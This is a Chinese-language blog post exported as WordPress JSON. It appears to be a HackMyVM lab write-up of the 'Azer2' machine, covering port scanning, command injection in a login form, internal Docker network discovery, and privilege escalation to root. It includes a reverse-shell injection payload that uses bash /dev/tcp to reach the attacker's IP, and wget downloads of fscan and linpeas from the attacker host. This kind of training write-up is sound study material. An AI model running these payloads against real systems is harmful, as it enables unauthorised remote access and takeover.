{"id":397,"date":"2024-03-16T01:03:49","date_gmt":"2024-03-15T17:03:49","guid":{"rendered":"http:\/\/162.14.82.114\/?p=397"},"modified":"2024-03-17T16:57:33","modified_gmt":"2024-03-17T08:57:33","slug":"hmv-_-azer2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/397\/03\/16\/2024\/","title":{"rendered":"hmv[-_-]Azer2"},"content":{"rendered":"

Azer2<\/h1>\n

\u4eca\u5929\u7b2c\u4e00\u6b21\u5c1d\u8bd5hackmyvm<\/code>\u7684\u673a\u5668\uff0c\u5c1d\u8bd5\u72ec\u7acb\u89e3\u51b3\u4e00\u4e0b\u8bd5\u8bd5\uff0c\u6253\u5f00\uff0c\u719f\u6089\u7684\u62a5\u9519\uff1a<\/p>\n

\"image-20240229005130861\"<\/div><\/p>\n

\u9ebb\u4e86\uff0c\u5c1d\u8bd5\u914d\u7f6e\u4e00\u4e0b\u9776\u573a\uff0c\u5148\u4f7f\u7528virtualbox\u6253\u5f00\uff0c\u4ee51.0<\/code>\u7684\u534f\u8bae\u8f6c\u5316\uff0c\u5230\u5904ova<\/code>\u518d\u4f7f\u7528vmware\u8fdb\u884c\u5347\u7ea7\uff1a<\/p>\n

\"image-20240314191135124\"<\/div>
\n
\"image-20240314191210177\"<\/div><\/p>\n

\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n

\"image-20240315232356158\"<\/div><\/p>\n

\u626b\u5230\u4e86\uff01<\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n

\u5148\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n

rustscan -a 10.161.61.133 -- -A -sV --script=vuln<\/code><\/pre>\n
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 10.161.61.133:80\nOpen 10.161.61.133:3000\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\nWarning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP\/1\\.1 \\d\\d\\d (?:[^\\r\\n]*\\r\\n(?!\\r\\n))*?.*\\r\\nServer: Virata-EmWeb\/R([\\d_]+)\\r\\nContent-Type: text\/html; ?charset=UTF-8\\r\\nExpires: .*<title>HP (Color |)LaserJet ([\\w._ -]+)\u00a0\u00a0\u00a0'\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-15 11:28 EDT\nNSE: Loaded 150 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 2) scan.\nInitiating NSE at 11:28\nCompleted NSE at 11:28, 10.01s elapsed\nNSE: Starting runlevel 2 (of 2) scan.\nInitiating NSE at 11:28\nCompleted NSE at 11:28, 0.00s elapsed\nInitiating Ping Scan at 11:28\nScanning 10.161.61.133 [2 ports]\nCompleted Ping Scan at 11:28, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 11:28\nCompleted Parallel DNS resolution of 1 host. at 11:28, 6.55s elapsed\nDNS resolution of 1 IPs took 6.55s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]\nInitiating Connect Scan at 11:28\nScanning 10.161.61.133 [2 ports]\nDiscovered open port 80\/tcp on 10.161.61.133\nDiscovered open port 3000\/tcp on 10.161.61.133\nCompleted Connect Scan at 11:28, 0.00s elapsed (2 total ports)\nInitiating Service scan at 11:28\nScanning 2 services on 10.161.61.133\nCompleted Service scan at 11:28, 11.16s elapsed (2 services on 1 host)\nNSE: Script scanning 10.161.61.133.\nNSE: Starting runlevel 1 (of 2) scan.\nInitiating NSE at 11:28\nNSE: [firewall-bypass 10.161.61.133] lacks privileges.\nNSE Timing: About 98.59% done; ETC: 11:29 (0:00:00 remaining)\nNSE Timing: About 98.59% done; ETC: 11:29 (0:00:01 remaining)\nCompleted NSE at 11:29, 66.70s elapsed\nNSE: Starting runlevel 2 (of 2) scan.\nInitiating NSE at 11:29\nNSE: [tls-ticketbleed 10.161.61.133:80] Not running due to lack of privileges.\nCompleted NSE at 11:29, 0.02s elapsed\nNmap scan report for 10.161.61.133\nHost is up, received syn-ack (0.0010s latency).\nScanned at 2024-03-15 11:28:31 EDT for 78s\n\nPORT     STATE SERVICE REASON  VERSION\n80\/tcp   open  http    syn-ack Apache httpd 2.4.57 ((Debian))\n|_http-jsonp-detection: Couldn't find any JSONP endpoints.\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable\n| http-csrf: \n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.161.61.133\n|   Found the following possible CSRF vulnerabilities: \n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagis99bd.html?Deger=500\n|     Form id: frm_bagis\n|     Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagis3f19.html?Deger=250\n|     Form id: frm_bagis\n|     Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagisfb23.html?Deger=0\n|     Form id: frm_bagis\n|     Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagis31df.html?Deger=150\n|     Form id: frm_bagis\n|     Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagis5fed.html?Deger=50\n|     Form id: frm_bagis\n|_    Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|_http-wordpress-users: [Error] WordPress installation was not found. We couldn't find wp-login.php\n| http-fileupload-exploiter: \n|   \n|_    Couldn't find a file-type field.\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\n|_http-dombased-xss: Couldn't find any DOM based XSS.\n| vulners: \n|   cpe:\/a:apache:http_server:2.4.57: \n|       OSV:BIT-APACHE-2023-45802       5.0     https:\/\/vulners.com\/osv\/OSV:BIT-APACHE-2023-45802\n|       OSV:BIT-APACHE-2023-43622       5.0     https:\/\/vulners.com\/osv\/OSV:BIT-APACHE-2023-43622\n|       OSV:BIT-2023-45802      5.0     https:\/\/vulners.com\/osv\/OSV:BIT-2023-45802\n|       OSV:BIT-2023-43622      5.0     https:\/\/vulners.com\/osv\/OSV:BIT-2023-43622\n|       F7F6E599-CEF4-5E03-8E10-FE18C4101E38    5.0     https:\/\/vulners.com\/githubexploit\/F7F6E599-CEF4-5E03-8E10-FE18C4101E38  *EXPLOIT*\n|       E5C174E5-D6E8-56E0-8403-D287DE52EB3F    5.0     https:\/\/vulners.com\/githubexploit\/E5C174E5-D6E8-56E0-8403-D287DE52EB3F  *EXPLOIT*\n|       DB6E1BBD-08B1-574D-A351-7D6BB9898A4A    5.0     https:\/\/vulners.com\/githubexploit\/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  *EXPLOIT*\n|       CVE-2023-43622  5.0     https:\/\/vulners.com\/cve\/CVE-2023-43622\n|       CVE-2023-31122  5.0     https:\/\/vulners.com\/cve\/CVE-2023-31122\n|       CNVD-2023-93320 5.0     https:\/\/vulners.com\/cnvd\/CNVD-2023-93320\n|       C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B    5.0     https:\/\/vulners.com\/githubexploit\/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  *EXPLOIT*\n|       BD3652A9-D066-57BA-9943-4E34970463B9    5.0     https:\/\/vulners.com\/githubexploit\/BD3652A9-D066-57BA-9943-4E34970463B9  *EXPLOIT*\n|       B0208442-6E17-5772-B12D-B5BE30FA5540    5.0     https:\/\/vulners.com\/githubexploit\/B0208442-6E17-5772-B12D-B5BE30FA5540  *EXPLOIT*\n|       A820A056-9F91-5059-B0BC-8D92C7A31A52    5.0     https:\/\/vulners.com\/githubexploit\/A820A056-9F91-5059-B0BC-8D92C7A31A52  *EXPLOIT*\n|       9814661A-35A4-5DB7-BB25-A1040F365C81    5.0     https:\/\/vulners.com\/githubexploit\/9814661A-35A4-5DB7-BB25-A1040F365C81  *EXPLOIT*\n|       5A864BCC-B490-5532-83AB-2E4109BB3C31    5.0     https:\/\/vulners.com\/githubexploit\/5A864BCC-B490-5532-83AB-2E4109BB3C31  *EXPLOIT*\n|       17C6AD2A-8469-56C8-BBBE-1764D0DF1680    5.0     https:\/\/vulners.com\/githubexploit\/17C6AD2A-8469-56C8-BBBE-1764D0DF1680  *EXPLOIT*\n|_      CVE-2023-45802  2.6     https:\/\/vulners.com\/cve\/CVE-2023-45802\n3000\/tcp open  http    syn-ack Node.js (Express middleware)\n|_http-jsonp-detection: Couldn't find any JSONP endpoints.\n|_http-wordpress-users: [Error] WordPress installation was not found. We couldn't find wp-login.php\n|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\n|_http-dombased-xss: Couldn't find any DOM based XSS.\n| http-csrf: \n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.161.61.133\n|   Found the following possible CSRF vulnerabilities: \n|     \n|     Path: http:\/\/10.161.61.133:3000\/\n|     Form id: username\n|_    Form action: \/login\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 2) scan.\nInitiating NSE at 11:29\nCompleted NSE at 11:29, 0.00s elapsed\nNSE: Starting runlevel 2 (of 2) scan.\nInitiating NSE at 11:29\nCompleted NSE at 11:29, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 95.45 seconds\n<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u5148\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\u4e1c\u897f\uff1a<\/p>\n
\"image-20240315233948039\"<\/div><\/p>\n
\u5230\u5904\u770b\u770b\uff0c\u987a\u4fbf\u626b\u63cf\u4e00\u4e0b<\/p>\n
dirsearch -u http:\/\/10.161.61.133 -e* -i 200,300-399 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 200<\/code><\/pre>\n
\uff08\u6253\u5b8c\u53d1\u73b0\u8fd8\u6ca1\u626b\u51fa\u6765\u3002\u3002\u3002\u3002\uff09<\/p>\n
\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u67e5\u770b\u4e00\u4e0b3000\u7aef\u53e3<\/h3>\n
\"image-20240315235858025\"<\/div><\/p>\n
\u5b58\u5728\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\u4ee5\u53ca\u5f31\u5bc6\u7801\uff1a<\/p>\n
\"image-20240316001016165\"<\/div><\/p>\n
\u4f3c\u4e4e\u662f\u6267\u884c\u4e86\u4e00\u4e2ashell\u811a\u672c\uff0c\u5c1d\u8bd5\u5f39\u4e00\u4e2a\u53cd\u5411shell\uff1a<\/p>\n
;bash -c 'exec bash -i &>\/dev\/tcp\/10.161.61.130\/1234 <&1'<\/code><\/pre>\n
\"image-20240316002019143\"<\/div><\/p>\n
\u5f39\u8fc7\u6765\u4e86\uff01<\/p>\n
\u67e5\u770b\u4e00\u4e0bflag\uff01<\/p>\n
cat user.txt\n0d2856d69dc348b3af80a0eed67c7502<\/code><\/pre>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
azer@azer:~$ whoami;id\nwhoami;id\nazer\nuid=1000(azer) gid=1000(azer) groups=1000(azer),100(users)\nazer@azer:~$ uname -a\nuname -a\nLinux azer 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU\/Linux\nazer@azer:~$ lsb_release -a\nlsb_release -a\nDistributor ID: Debian\nDescription:    Debian GNU\/Linux 12 (bookworm)\nRelease:        12\nCodename:       bookworm\nazer@azer:~$ crontab -l\ncrontab -l\nno crontab for azer <\/code><\/pre>\n
\u67e5\u770b\u7f51\u5361\u4fe1\u606f<\/h3>\n
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000                                                                                                          \n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host noprefixroute \n       valid_lft forever preferred_lft forever\n2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000\n    link\/ether 00:0c:29:36:f0:b0 brd ff:ff:ff:ff:ff:ff\n    altname enp2s1\n    inet 10.161.61.133\/24 brd 10.161.61.255 scope global dynamic ens33\n       valid_lft 1167sec preferred_lft 1167sec\n    inet6 fe80::20c:29ff:fe36:f0b0\/64 scope link \n       valid_lft forever preferred_lft forever\n3: br-333bcb432cd5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default \n    link\/ether 02:42:20:87:b8:aa brd ff:ff:ff:ff:ff:ff\n    inet 10.10.10.1\/24 brd 10.10.10.255 scope global br-333bcb432cd5\n       valid_lft forever preferred_lft forever\n    inet6 fe80::42:20ff:fe87:b8aa\/64 scope link \n       valid_lft forever preferred_lft forever\n4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default \n    link\/ether 02:42:16:b1:2b:71 brd ff:ff:ff:ff:ff:ff\n    inet 172.17.0.1\/16 brd 172.17.255.255 scope global docker0\n       valid_lft forever preferred_lft forever\n6: veth05e3397@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-333bcb432cd5 state UP group default \n    link\/ether 0e:59:88:7a:96:ad brd ff:ff:ff:ff:ff:ff link-netnsid 0\n    inet6 fe80::c59:88ff:fe7a:96ad\/64 scope link \n       valid_lft forever preferred_lft forever<\/code><\/pre>\n
\u53d1\u73b0\u4e86\u4e00\u4e2adocker<\/code>\u5bb9\u5668\u3002<\/p>\n
\u4f01\u56fe\u67e5\u770b\u4e00\u4e0bdocker\u4fe1\u606f\uff0c\u4f46\u662f\u6ca1\u5565\u5927\u7528\uff1a<\/p>\n
azer@azer:\/var\/www\/html\/v6$ docker ps -a\ndocker ps -a\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get "http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1": dial unix \/var\/run\/docker.sock: connect: permission denied\nazer@azer:\/var\/www\/html\/v6$ docker info\ndocker info\nClient: Docker Engine - Community\n Version:    25.0.3\n Context:    default\n Debug Mode: false\n Plugins:\n  buildx: Docker Buildx (Docker Inc.)\n    Version:  v0.12.1\n    Path:     \/usr\/libexec\/docker\/cli-plugins\/docker-buildx\n  compose: Docker Compose (Docker Inc.)\n    Version:  v2.24.5\n    Path:     \/usr\/libexec\/docker\/cli-plugins\/docker-compose\n\nServer:\nERROR: permission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get "http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/info": dial unix \/var\/run\/docker.sock: connect: permission denied\nerrors pretty printing info\n<\/code><\/pre>\n
\u4e0a\u4f20\u4e00\u4e2afscan<\/code>\u67e5\u770b\u4e00\u4e0b\u5185\u7f51\u4fe1\u606f\uff1a<\/p>\n
azer@azer:\/tmp$ wget 10.161.61.130:8888\/fscan       \nwget 10.161.61.130:8888\/fscan\n--2024-03-15 12:31:30--  http:\/\/10.161.61.130:8888\/fscan\nConnecting to 10.161.61.130:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 24379392 (23M) [application\/octet-stream]\nSaving to: \u2018fscan\u2019\n\nfscan               100%[===================>]  23.25M  26.2MB\/s    in 0.9s    \n\n2024-03-15 12:31:31 (26.2 MB\/s) - \u2018fscan\u2019 saved [24379392\/24379392]\n\nazer@azer:\/tmp$ .\/fscan -h 10.10.10.1\/24\n.\/fscan -h 10.10.10.1\/24\nbash: .\/fscan: Permission denied\nazer@azer:\/tmp$ chmod +x fscan\nchmod +x fscan\nazer@azer:\/tmp$ .\/fscan -h 10.10.10.1\/24\n.\/fscan -h 10.10.10.1\/24\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   <    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.3\nstart infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n[*] Icmp alive hosts len is: 0\nstart vulscan\n\u5df2\u5b8c\u6210 0\/0\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 6.226452119s<\/code><\/pre>\n
\u5565\u90fd\u6ca1\u626b\u5230\uff0c\u554a\u8fd9\u3002\u4f20\u4e00\u4e2alinpeans<\/code>\u8bd5\u8bd5\uff1a<\/p>\n
azer@azer:\/tmp$ wget http:\/\/10.161.61.130:8888\/linpeas.sh         \nwget http:\/\/10.161.61.130:8888\/linpeas.sh\n--2024-03-15 12:48:43--  http:\/\/10.161.61.130:8888\/linpeas.sh\nConnecting to 10.161.61.130:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 332111 (324K) [text\/x-sh]\nSaving to: \u2018linpeas.sh\u2019\n\nlinpeas.sh          100%[===================>] 324.33K  --.-KB\/s    in 0.04s   \n\n2024-03-15 12:48:43 (7.59 MB\/s) - \u2018linpeas.sh\u2019 saved [332111\/332111]\n\nazer@azer:\/tmp$ chmod +x linpeas.sh\nchmod +x linpeas.sh\nazer@azer:\/tmp$ .\/linpeas.sh<\/code><\/pre>\n
\u67e5\u770b\u5230\u4e86\u4e00\u4e2a\u9632\u706b\u5899\u7684\u8fc7\u6ee4\u5668\uff1a<\/p>\n
[+] Iptables rules\n*filter                                                                                                                                                                                              \n:INPUT ACCEPT [0:0]\n:FORWARD DROP [0:0]\n:OUTPUT ACCEPT [0:0]\n:DOCKER - [0:0]\n:DOCKER-ISOLATION-STAGE-1 - [0:0]\n:DOCKER-ISOLATION-STAGE-2 - [0:0]\n:DOCKER-USER - [0:0]\n-A FORWARD -j DOCKER-USER\n-A FORWARD -j DOCKER-ISOLATION-STAGE-1\n-A FORWARD -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker0 -j DOCKER\n-A FORWARD -i docker0 ! -o docker0 -j ACCEPT\n-A FORWARD -i docker0 -o docker0 -j ACCEPT\n-A FORWARD -o br-333bcb432cd5 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o br-333bcb432cd5 -j DOCKER\n-A FORWARD -i br-333bcb432cd5 ! -o br-333bcb432cd5 -j ACCEPT\n-A FORWARD -i br-333bcb432cd5 -o br-333bcb432cd5 -j ACCEPT\n-A OUTPUT -p icmp -j DROP\n-A DOCKER-ISOLATION-STAGE-1 -i docker0 ! -o docker0 -j DOCKER-ISOLATION-STAGE-2\n-A DOCKER-ISOLATION-STAGE-1 -i br-333bcb432cd5 ! -o br-333bcb432cd5 -j DOCKER-ISOLATION-STAGE-2\n-A DOCKER-ISOLATION-STAGE-1 -j RETURN\n-A DOCKER-ISOLATION-STAGE-2 -o docker0 -j DROP\n-A DOCKER-ISOLATION-STAGE-2 -o br-333bcb432cd5 -j DROP\n-A DOCKER-ISOLATION-STAGE-2 -j RETURN\n-A DOCKER-USER -j RETURN\nCOMMIT\n*nat\n:PREROUTING ACCEPT [0:0]\n:INPUT ACCEPT [0:0]\n:OUTPUT ACCEPT [0:0]\n:POSTROUTING ACCEPT [0:0]\n:DOCKER - [0:0]\n-A PREROUTING -m addrtype --dst-type LOCAL -j DOCKER\n-A OUTPUT ! -d 127.0.0.0\/8 -m addrtype --dst-type LOCAL -j DOCKER\n-A POSTROUTING -s 172.17.0.0\/16 ! -o docker0 -j MASQUERADE\n-A POSTROUTING -s 10.10.10.0\/24 ! -o br-333bcb432cd5 -j MASQUERADE\n-A DOCKER -i docker0 -j RETURN\n-A DOCKER -i br-333bcb432cd5 -j RETURN\nCOMMIT<\/code><\/pre>\n
\u770b\u5230\u628aicmp<\/code>\u7981\u6389\u4e86\uff0c\u8bf4\u660e\u662f\u65e0\u6cd5\u8fdb\u884cping\u7684\uff0c\u6539\u6389\u8fd9\u4e2aping\u518d\u8bd5\u8bd5\uff1a<\/p>\n
.\/fscan -h 10.10.10.1\/24 -np -nopoc -noredis <\/code><\/pre>\n
\u4e0d\u7ba1\u4ed6\uff0c\u6211\u4eec\u53ea\u8981\u63a2\u6d4b\u5b58\u6d3b\u4e3b\u673a\u5c31\u884c\u4e86\uff0c\u5565\u6ca1\u5fc5\u8981\u7684\u5168\u90e8\u90fd\u7ed9\u4ed6\u5173\u6389\u3002<\/p>\n
start infoscan\n10.10.10.10:80 open\n10.10.10.1:80 open<\/code><\/pre>\n
\u8bbf\u95ee\u770b\u4e00\u4e0b\u3002<\/p>\n
azer@azer:~$ curl 10.10.10.10:80\ncurl 10.10.10.10:80\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100    17  100    17    0     0    425      0 --:--:-- --:--:-- --:--:--   435\n.:.AzerBulbul.:.<\/code><\/pre>\n
\u96be\u9053\u662fflag\uff1f\u63d0\u4ea4\u53d1\u73b0\u4e0d\u662f\u7684\uff0c\u5c1d\u8bd5\u5207\u6362root\uff0c\u6210\u529f\uff01<\/p>\n
azer@azer:~$ su root\nsu root\nPassword: .:.AzerBulbul.:.\nwhoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\ncd \/root\nls\nroot.txt\ncat root.txt\nb5d96aec2d5f1541c5e7910ccab527d8<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Azer2 \u4eca\u5929\u7b2c\u4e00\u6b21\u5c1d\u8bd5hackmyvm\u7684\u673a\u5668\uff0c\u5c1d\u8bd5\u72ec\u7acb\u89e3\u51b3\u4e00\u4e0b\u8bd5\u8bd5\uff0c\u6253\u5f00\uff0c\u719f\u6089\u7684\u62a5\u9519\uff1a \u9ebb\u4e86\uff0c\u5c1d\u8bd5\u914d\u7f6e\u4e00\u4e0b […]<\/p>\n","protected":false},"author":1,"featured_media":115,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-397","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/397","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=397"}],"version-history":[{"count":3,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/397\/revisions"}],"predecessor-version":[{"id":400,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/397\/revisions\/400"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media\/115"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=397"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=397"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=397"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}